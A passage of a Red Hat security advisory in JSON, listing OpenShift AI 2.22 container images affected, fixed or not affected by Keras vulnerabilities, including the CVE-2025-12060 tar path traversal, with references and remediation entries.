"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "keras: Arbitary Code execution in Keras load_model()"
},
{
"cve": "CVE-2025-12060",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-10-30T18:01:32.193676+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407443"
}
],
"notes": [
{
"category": "description",
"text": "The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python\u0027s tarfile.extractall function without the filter=\"data\" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517.\u00a0Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "keras: Keras Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-12060"
},
{
"category": "external",
"summary": "RHBZ#2407443",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407443"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-12060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12060"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/pull/21760",
"url": "https://github.com/keras-team/keras/pull/21760"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9"
}
],
"release_date": "2025-10-30T17:10:43.868000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
